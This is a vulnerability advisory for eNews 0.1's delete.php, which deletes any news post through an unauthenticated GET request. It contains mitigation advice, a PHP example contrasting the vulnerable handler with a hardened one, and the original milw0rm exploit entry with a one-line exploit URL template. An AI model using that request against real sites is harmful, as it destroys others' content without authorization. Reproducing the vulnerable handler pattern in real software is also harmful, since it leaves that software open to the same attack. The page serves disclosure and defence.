vendor: eNews 0.1
by: iLker Kandemir [MEFISTO]
CVSS: 7.5 (HIGH)
CWE: 20
Arbitrary Delete Post Vulnerability
Product Name: eNews 0.1
Affected Version From: eNews 0.1
Affected Version To: eNews 0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability

delete.php in eNews 0.1 removes the news post whose id is passed in the "delete" GET parameter. The excerpt in the advisory below shows no authentication or authorization check before the DELETE statement is built, so an attacker who knows or guesses a post id can remove any post with a single unauthenticated GET request. The id is cast to an integer before it reaches the query, so the flaw is missing access control on a state-changing action rather than SQL injection.

Mitigation:

No vendor patch is listed. Restrict delete.php to authenticated administrators by checking the session before the query is built, accept the deletion only via POST carrying a per-session CSRF token, and keep validating the id as a positive integer. The existing integer cast already prevents SQL injection; it does nothing to stop an unauthorized caller, which is the actual problem here.
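The following is an added example, not code from eNews or from the advisory author: the vulnerable handler pattern from the excerpt, written out beside a hardened version that enforces the checks listed above. The table and column names follow the excerpt; the $_SESSION['admin'] flag, the "csrf" form field and the mysqli connection are assumptions made for the illustration.

```php
<?php
// Added example (not eNews code). Assumptions: a mysqli connection $db,
// a "news" table with an integer "id" column (as in the advisory excerpt),
// and an $_SESSION['admin'] flag set by the application's login.

// Vulnerable pattern, as in the advisory: the integer cast stops SQL
// injection, but nothing checks who is asking, so any anonymous
// GET /delete.php?delete=N removes post N.
function vulnerable_delete(mysqli $db): void
{
    if (isset($_GET['delete']) && $_GET['delete'] !== "") {
        $id = intval($_GET['delete']);          // equivalent of GetSQLValueString(..., "int")
        $db->query("DELETE FROM news WHERE id=$id");
    }
}

// Hardened version: authentication, POST-only, CSRF token, strict id
// validation and a prepared statement.
function hardened_delete(mysqli $db): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }

    // 1. Only a logged-in administrator may delete posts.
    if (empty($_SESSION['admin'])) {
        http_response_code(403);
        exit('forbidden');
    }

    // 2. A state-changing action must not be reachable via a plain GET link
    //    (prefetchers, hot-linked images and crawlers would trigger it).
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('method not allowed');
    }

    // 3. CSRF token bound to the session, compared in constant time.
    if (!isset($_POST['csrf'], $_SESSION['csrf'])
        || !hash_equals($_SESSION['csrf'], (string) $_POST['csrf'])) {
        http_response_code(403);
        exit('bad csrf token');
    }

    // 4. Validate the id as a positive integer; filter_input returns false
    //    for a non-integer value and null when the field is absent.
    $id = filter_input(INPUT_POST, 'delete', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    if ($id === false || $id === null) {
        http_response_code(400);
        exit('bad id');
    }

    // 5. Prepared statement: the cast already made this safe, but a bound
    //    parameter keeps it safe if the column type ever changes.
    $stmt = $db->prepare('DELETE FROM news WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    if ($stmt->affected_rows === 0) {
        http_response_code(404);       // no such post, or already deleted
    }
}

// Form helper: emit the per-session CSRF token for the delete form.
// Call after the session has been started.
function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}
```

The delete form in the admin page would then submit `delete` and `csrf` (from csrf_token()) via POST, and the handler calls hardened_delete($db). The order of checks matters: the authentication test comes first so that an anonymous request learns nothing about which post ids exist.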

Exploit-DB raw data:

eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability


Author: iLker Kandemir [MEFISTO]

Script download : http://www.hotscripts.com/Detailed/81086.html

script demo : http://emvvy.com/demos/enews/

site : www.dumenci.net

----------------------------------------------------------------
//poc:

// delete.php excerpt: no session or role check precedes the DELETE; the "int" cast
// in GetSQLValueString blocks SQL injection but lets any visitor name any post id.
if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
  $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
                       GetSQLValueString($_GET['delete'], "int"));

----------------------------------------------------------------

//exploit :

http://[site]/delete.php?delete=[eNews_id]

----------------------------------------------------------------

tnx : aLL my FriEndZ 

# milw0rm.com [2008-06-21]